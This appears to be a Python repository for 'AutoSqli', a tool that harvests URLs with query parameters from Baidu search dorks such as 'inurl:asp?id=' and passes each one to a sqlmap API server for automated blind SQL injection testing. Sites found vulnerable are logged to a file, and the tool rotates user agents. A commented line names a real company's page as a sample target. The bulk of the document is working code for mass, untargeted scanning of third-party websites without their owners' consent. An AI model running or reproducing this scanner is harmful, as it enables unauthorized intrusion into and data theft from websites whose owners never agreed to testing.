├── search
│   ├── __init__.py
│   └── baidu.py
├── keyword.txt
├── data
│   └── injection.txt
├── .gitignore
├── config.py
├── README.md
├── set_option.txt
└── AutoSqli.py
/search/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/keyword.txt:
--------------------------------------------------------------------------------
1 | site:.hk inurl:.php?
--------------------------------------------------------------------------------
/data/injection.txt:
--------------------------------------------------------------------------------
1 | http://www.example.com
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .DS_Store
3 | *.log
4 | data/*.*
--------------------------------------------------------------------------------
/config.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | import logging
4 |
5 | API_URL = "http://127.0.0.1:8775"
6 |
7 | LEVELS = {'debug': logging.DEBUG,
8 |           'info': logging.INFO,
9 |           'warning': logging.WARNING,
10 |           'error': logging.ERROR,
11 |           'critical': logging.CRITICAL}
12 |
13 | LOG = {
14 |     "level": LEVELS["debug"],
15 |     "filename": "autosqli.log",
16 |     "format": '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
17 |     "datefmt": '%Y-%m-%d %H:%M:%S'
18 | }
19 |
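20 | # Usage (a minimal sketch mirroring what AutoSqli.main() does with this config):
21 | #
22 | #   import logging
23 | #   from config import LOG, API_URL
24 | #   logger = logging.getLogger('app')
25 | #   logger.setLevel(LOG["level"])
26 | #   fh = logging.FileHandler(LOG["filename"])
27 | #   fh.setFormatter(logging.Formatter(LOG["format"], LOG["datefmt"]))
28 | #   logger.addHandler(fh)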
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## sqlmapapi_pi batch SQL injection tool
2 | ------------
3 | **Introduction:**
4 |
5 | - This program is a secondary development of [manning23](https://github.com/manning23)'s project; the original write-up is at [click me](http://drops.wooyun.org/tips/6653).
6 | - It crawls Baidu for candidate URLs, then calls sqlmapapi (sqlmap's built-in batch interface) to test each of them for SQL injection.
7 | - The options set in AutoSqli.py follow set_option.txt; the injection-detection technique is configurable, e.g., time-based or boolean-based, as the snippet below shows.
8 |
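9 | Concretely, `AutoSqli.option_set()` posts this override to `option/<taskid>/set` (in sqlmap's technique string, `B` is boolean-based blind and `T` is time-based blind):
10 |
11 | ```json
12 | {
13 |     "options": {
14 |         "randomAgent": true,
15 |         "tech": "BT"
16 |     }
17 | }
18 | ```
19 |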
20 | **Usage:**
21 | - In the sqlmap directory, run `python sqlmapapi.py -s` to start the API server.
22 | - Run AutoSqli.py with `python AutoSqli.py`; the arguments are listed by `-h`.
23 | - The raw API calls behind a scan are sketched at the end of this README.
24 |
25 | **Tips:**
26 | * Note that the search keyword is defined in the code: `key='inurl:asp?id='`
27 | * The thread count (`nloops = range(4)  # thread count`) can also be set with `-n`.
28 | * Keep the thread count small, or the scans may hang.
29 | * Do not use this tool for anything illegal.
30 |
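31 | **API flow** (a minimal sketch of the REST calls AutoSqli.py makes; assumes the server started by `python sqlmapapi.py -s` is listening on the default `http://127.0.0.1:8775`, and the target URL below is a placeholder):
32 |
33 | ```python
34 | import json
35 | import time
36 |
37 | import requests
38 |
39 | server = 'http://127.0.0.1:8775/'
40 | headers = {'Content-Type': 'application/json'}
41 |
42 | taskid = json.loads(requests.get(server + 'task/new').text)['taskid']    # create a task
43 | requests.post(server + 'option/' + taskid + '/set', headers=headers,     # override options
44 |               data=json.dumps({'options': {'randomAgent': True, 'tech': 'BT'}}))
45 | requests.post(server + 'scan/' + taskid + '/start', headers=headers,     # start the scan
46 |               data=json.dumps({'url': 'http://www.example.com/item.php?id=1'}))
47 | while json.loads(requests.get(server + 'scan/' + taskid + '/status').text)['status'] == 'running':
48 |     time.sleep(10)                                                        # poll until the engine terminates
49 | data = json.loads(requests.get(server + 'scan/' + taskid + '/data').text)['data']
50 | print(data or 'no injection found')                                      # an empty list means no injection
51 | requests.get(server + 'task/' + taskid + '/delete')                      # clean up the task
52 | ```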
--------------------------------------------------------------------------------
/search/baidu.py:
--------------------------------------------------------------------------------
1 | #coding: utf-8
2 | from __future__ import unicode_literals
3 |
4 | import urllib2
5 | import string
6 | import urllib
7 | import re
8 | import random
9 | import logging
10 |
11 | __all__ = ["geturl"]
12 |
13 | USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0',
14 |                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0',
15 |                'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ '
16 |                '(KHTML, like Gecko) Element Browser 5.0',
17 |                'IBM WebExplorer /v0.94', 'Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)',
18 |                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
19 |                'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
20 |                'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) '
21 |                'Version/6.0 Mobile/10A5355d Safari/8536.25',
22 |                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '
23 |                'Chrome/28.0.1468.0 Safari/537.36',
24 |                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
25 |
26 | logger = logging.getLogger('app.baidu')
27 |
28 | def baidu_search(keyword, pn):
29 |     p = {'wd': keyword}
30 |     res = urllib2.urlopen(("http://www.baidu.com/s?" + urllib.urlencode(p) + "&pn={0}&cl=3&rn=10").format(pn))  # rn = results per page, pn = index of the first result shown
31 |     html = res.read()
32 |     return html
33 |
34 | def getList(regex, text):  # collect every match of regex in text into a list
35 |     arr = []
36 |     res = re.findall(regex, text)
37 |     if res:
38 |         for r in res:
39 |             arr.append(r)
40 |     return arr
41 |
42 | def getMatch(regex, text):  # return the first match of regex in text, or '' if none
43 |     res = re.findall(regex, text)
44 |     if res:
45 |         return res[0]
46 |     return ''
47 |
48 | def is_get(url):  # is this a GET-style link that sqlmap can test?
49 |     regex = r'(\S*?)\?.*=.*'
50 |     res = re.match(regex, url)
51 |     if res:
52 |         # res.group(1) is the URL up to the query string
53 |         return res.group(1)
54 |     else:
55 |         return 0
56 | # def Deduplication():
57 | #     regex = r'\S'
58 |
59 | def geturl(keyword, pages):  # crawl Baidu and collect candidate target URLs
60 |     targets = []
61 |     hosts = []
62 |     for page in range(0, int(pages)):
63 |         pn = (page + 1) * 10
64 |         html = baidu_search(keyword, pn)
65 |         content = unicode(html, 'utf-8', 'ignore')
66 |         arrList = getList(u'<div class="result c-container "[^>]*>(.*?)</div>', content)  # split the page into per-result blocks (the tag pattern was lost in extraction; adjust it to Baidu's current markup)
67 |         #print arrList
68 |         # f2 = open('content.txt', 'a')
69 |         # f2.write(str(arrList) + '\n')  # debugging: dump the raw result blocks
70 |         # f2.close()
71 |         for item in arrList:
72 |             regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
73 |             link = getMatch(regex, item)  # a (title, url) tuple, or '' when nothing matched
74 |             url = link[1] if link else ''  # the Baidu-rewritten redirect URL
75 |             try:
76 |                 domain = urllib2.Request(url)
77 |                 r = random.randint(0, len(USER_AGENTS) - 1)  # randint is inclusive at both ends
78 |                 domain.add_header('User-agent', USER_AGENTS[r])
79 |                 domain.add_header('connection', 'keep-alive')
80 |                 response = urllib2.urlopen(domain)
81 |                 uri = response.geturl()  # follow the redirect to the real URL
82 |                 urs = is_get(uri)  # base URL if it is a classic GET-style link
83 |                 if (uri in targets) or (urs in hosts):
84 |                     continue
85 |                 else:
86 |                     targets.append(uri)
87 |                     hosts.append(urs)
88 |                     f1 = open('data/targets.txt', 'a')  # record the target URL
89 |                     f1.write(uri + '\n')
90 |                     f1.close()
91 |             except Exception:
92 |                 continue
93 |     logger.info("URLs have been grabbed!")
94 |     return targets
95 |
96 | if __name__ == '__main__':
97 |     pass
98 |
99 |
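100 | # Example (a minimal sketch; the keyword below is the one shipped in keyword.txt):
101 | #
102 | #   urls = geturl('site:.hk inurl:.php?', 2)  # crawl two pages of Baidu results
103 | #   # urls is a deduplicated list of resolved targets, also appended to data/targets.txt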
--------------------------------------------------------------------------------
/set_option.txt:
--------------------------------------------------------------------------------
1 | {
2 | "options": {
3 | "crawlDepth": null,
4 | "osShell": false,
5 | "getUsers": false,
6 | "getPasswordHashes": false,
7 | "excludeSysDbs": false,
8 | "uChar": null,
9 | "regData": null,
10 | "cpuThrottle": 5,
11 | "prefix": null,
12 | "code": null,
13 | "googlePage": 1,
14 | "query": null,
15 | "randomAgent": false,
16 | "delay": 0,
17 | "isDba": false,
18 | "requestFile": null,
19 | "predictOutput": false,
20 | "wizard": false,
21 | "stopFail": false,
22 | "forms": false,
23 | "taskid": "73674cc5eace4ac7",
24 | "skip": null,
25 | "dropSetCookie": false,
26 | "smart": false,
27 | "risk": 1,
28 | "sqlFile": null,
29 | "rParam": null,
30 | "getCurrentUser": false,
31 | "notString": null,
32 | "getRoles": false,
33 | "getPrivileges": false,
34 | "testParameter": null,
35 | "tbl": null,
36 | "charset": null,
37 | "trafficFile": null,
38 | "osSmb": false,
39 | "level": 1,
40 | "secondOrder": null,
41 | "pCred": null,
42 | "timeout": 30,
43 | "firstChar": null,
44 | "updateAll": false,
45 | "binaryFields": false,
46 | "checkTor": false,
47 | "aType": null,
48 | "direct": null,
49 | "saFreq": 0,
50 | "tmpPath": null,
51 | "titles": false,
52 | "getSchema": false,
53 | "identifyWaf": false,
54 | "checkWaf": false,
55 | "regKey": null,
56 | "limitStart": null,
57 | "loadCookies": null,
58 | "dnsName": null,
59 | "csvDel": ",",
60 | "oDir": null,
61 | "osBof": false,
62 | "invalidLogical": false,
63 | "getCurrentDb": false,
64 | "hexConvert": false,
65 | "answers": null,
66 | "host": null,
67 | "dependencies": false,
68 | "cookie": null,
69 | "proxy": null,
70 | "regType": null,
71 | "optimize": false,
72 | "limitStop": null,
73 | "mnemonics": null,
74 | "uFrom": null,
75 | "noCast": false,
76 | "testFilter": null,
77 | "eta": false,
78 | "threads": 1,
79 | "logFile": null,
80 | "os": null,
81 | "col": null,
82 | "rFile": null,
83 | "verbose": 1,
84 | "aCert": null,
85 | "torPort": null,
86 | "privEsc": false,
87 | "forceDns": false,
88 | "getAll": false,
89 | "api": true,
90 | "url": null,
91 | "invalidBignum": false,
92 | "regexp": null,
93 | "getDbs": false,
94 | "freshQueries": false,
95 | "uCols": null,
96 | "smokeTest": false,
97 | "pDel": null,
98 | "wFile": null,
99 | "udfInject": false,
100 | "tor": false,
101 | "forceSSL": false,
102 | "beep": false,
103 | "saveCmdline": false,
104 | "configFile": null,
105 | "scope": null,
106 | "dumpAll": false,
107 | "torType": "HTTP",
108 | "regVal": null,
109 | "dummy": false,
110 | "commonTables": false,
111 | "search": false,
112 | "skipUrlEncode": false,
113 | "referer": null,
114 | "liveTest": false,
115 | "purgeOutput": false,
116 | "retries": 3,
117 | "extensiveFp": false,
118 | "dumpTable": false,
119 | "database": "/tmp/sqlmapipc-EmjjlQ",
120 | "batch": true,
121 | "headers": null,
122 | "flushSession": false,
123 | "osCmd": null,
124 | "suffix": null,
125 | "dbmsCred": null,
126 | "regDel": false,
127 | "shLib": null,
128 | "nullConnection": false,
129 | "timeSec": 5,
130 | "msfPath": null,
131 | "noEscape": false,
132 | "getHostname": false,
133 | "sessionFile": null,
134 | "disableColoring": true,
135 | "getTables": false,
136 | "agent": null,
137 | "lastChar": null,
138 | "string": null,
139 | "dbms": null,
140 | "tamper": null,
141 | "hpp": false,
142 | "runCase": null,
143 | "osPwn": false,
144 | "evalCode": null,
145 | "cleanup": false,
146 | "getBanner": false,
147 | "profile": false,
148 | "regRead": false,
149 | "bulkFile": null,
150 | "safUrl": null,
151 | "db": null,
152 | "dumpFormat": "CSV",
153 | "alert": null,
154 | "user": null,
155 | "parseErrors": false,
156 | "aCred": null,
157 | "getCount": false,
158 | "dFile": null,
159 | "data": null,
160 | "regAdd": false,
161 | "ignoreProxy": false,
162 | "getColumns": false,
163 | "mobile": false,
164 | "googleDork": null,
165 | "sqlShell": false,
166 | "pageRank": false,
167 | "tech": "BEUSTQ",
168 | "textOnly": false,
169 | "commonColumns": false,
170 | "keepAlive": false
171 | }
172 | }
173 |
--------------------------------------------------------------------------------
/AutoSqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #-*-coding:utf-8-*-
3 | from __future__ import absolute_import, print_function
4 |
5 | import requests
6 | import time
7 | import json
8 | import threading
9 | import Queue
10 | from search import baidu
11 | import logging
12 | from config import LOG, API_URL
13 |
14 |
15 | class AutoSqli(object):
16 |     """
17 |     Drive one scan per target URL against the REST server
18 |     started by sqlmapapi.py.
19 |     """
20 |     def __init__(self, server='', target='', data='', referer='', cookie=''):
21 |         super(AutoSqli, self).__init__()
22 |         self.server = server
23 |         if self.server[-1] != '/':
24 |             self.server = self.server + '/'
25 |         self.target = target
26 |         self.taskid = ''
27 |         self.engineid = ''
28 |         self.status = ''
29 |         self.data = data
30 |         self.referer = referer
31 |         self.cookie = cookie
32 |         self.start_time = time.time()
33 |         self.logger = logging.getLogger('app.run')
34 |         self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
35 |
36 |     def task_new(self):
37 |         try:
38 |             self.taskid = json.loads(
39 |                 requests.get(self.server + 'task/new').text)['taskid']
40 |             #print 'Created new task: ' + self.taskid
41 |             if len(self.taskid) > 0:
42 |                 return True
43 |             return False
44 |         except requests.exceptions.ConnectionError:
45 |             self.logger.error("sqlmapapi.py is not running")
46 |
47 |     def task_delete(self):
48 |         json_delete = requests.get(self.server + 'task/' + self.taskid + '/delete').text
49 |         # if json.loads(json_delete)['success']:
50 |         #     #print '[%s] Deleted task' % (self.taskid)
51 |         #     return True
52 |         # return False
53 |
54 |     def scan_start(self):
55 |         headers = {'Content-Type': 'application/json'}
56 |         self.logger.debug("Starting to scan " + self.target + " ...")
57 |         payload = {'url': self.target}
58 |         url = self.server + 'scan/' + self.taskid + '/start'
59 |         t = json.loads(
60 |             requests.post(url, data=json.dumps(payload), headers=headers).text)
61 |         self.engineid = t['engineid']
62 |         if len(str(self.engineid)) > 0 and t['success']:
63 |             #print 'Started scan'
64 |             return True
65 |         return False
66 |
67 |     def scan_status(self):
68 |         self.status = json.loads(
69 |             requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
70 |         if self.status == 'running':
71 |             return 'running'
72 |         elif self.status == 'terminated':
73 |             return 'terminated'
74 |         else:
75 |             return 'error'
76 |
77 |     def scan_data(self):
78 |         self.data = json.loads(
79 |             requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
80 |         if len(self.data) == 0:
81 |             #print 'not injection\t'
82 |             pass
83 |         else:
84 |             f = open('data/injection.txt', 'a')
85 |             f.write(self.target + '\n')
86 |             f.close()
87 |             self.logger.warning('injection found: ' + self.target)
88 |
89 |     def option_set(self):
90 |         headers = {'Content-Type': 'application/json'}
91 |         option = {"options": {
92 |             "randomAgent": True,
93 |             "tech": "BT"  # boolean-based and time-based blind only
94 |         }
95 |         }
96 |         url = self.server + 'option/' + self.taskid + '/set'
97 |         t = json.loads(
98 |             requests.post(url, data=json.dumps(option), headers=headers).text)
99 |         #print t
100 |
101 |     def scan_stop(self):
102 |         json_stop = requests.get(self.server + 'scan/' + self.taskid + '/stop').text
103 |         # json.loads(
104 |         #     requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']
105 |
106 |     def scan_kill(self):
107 |         json_kill = requests.get(self.server + 'scan/' + self.taskid + '/kill').text
108 |         # json.loads(
109 |         #     requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']
110 |
111 |     def run(self):
112 |         if not self.task_new():
113 |             return False
114 |         self.option_set()
115 |         if not self.scan_start():
116 |             return False
117 |         while True:
118 |             if self.scan_status() == 'running':
119 |                 time.sleep(10)
120 |             elif self.scan_status() == 'terminated':
121 |                 break
122 |             else:
123 |                 break
124 |             #print time.time() - self.start_time
125 |             if time.time() - self.start_time > 500:
126 |                 # the scan has run past the 500-second budget; abort it
127 |                 self.scan_stop()
128 |                 self.scan_kill()
129 |                 break
130 |         self.scan_data()
131 |         self.task_delete()
132 |         #print time.time() - self.start_time
133 |
134 | class myThread(threading.Thread):
135 |     def __init__(self, q, thread_id):
136 |         threading.Thread.__init__(self)
137 |         self.q = q
138 |         self.thread_id = thread_id
139 |     def run(self):
140 |         while not self.q.empty():
141 |             #print "threading " + str(self.thread_id) + " is running"
142 |             objects = self.q.get()
143 |             result = objects.run()
144 |
145 | def main():
146 |     import argparse
147 |     parser = argparse.ArgumentParser()
148 |     parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
149 |     parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
150 |     parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of the debug log")
151 |     args = parser.parse_args()
152 |     logger = logging.getLogger('app')
153 |     logger.setLevel(LOG["level"])
154 |     fh = logging.FileHandler(args.log)
155 |     fh.setLevel(LOG["level"])
156 |     formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
157 |     fh.setFormatter(formatter)
158 |     sh = logging.StreamHandler()
159 |     sh.setLevel(LOG["level"])
160 |     sh.setFormatter(formatter)
161 |     logger.addHandler(fh)
162 |     logger.addHandler(sh)
163 |     urls = []
164 |     logger.info('the program starts!')
165 |     pages = args.page
166 |     key = 'inurl:asp?id='
167 |     urls = baidu.geturl(key, pages)
168 |     #print urls
169 |     workQueue = Queue.Queue()
170 |     for tar in urls:
171 |         s = AutoSqli(API_URL, tar)
172 |         workQueue.put(s)
173 |     threads = []
174 |     nloops = range(args.num)  # thread count
175 |     for i in nloops:
176 |         t = myThread(workQueue, i)
177 |         t.start()
178 |         threads.append(t)
179 |     for i in nloops:
180 |         threads[i].join()
181 |     logger.info("Exiting Main Thread")
182 |
183 | if __name__ == '__main__':
184 |     main()
185 |
186 |
187 |
188 |
189 | # t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191')
190 | # t.run()
191 |
--------------------------------------------------------------------------------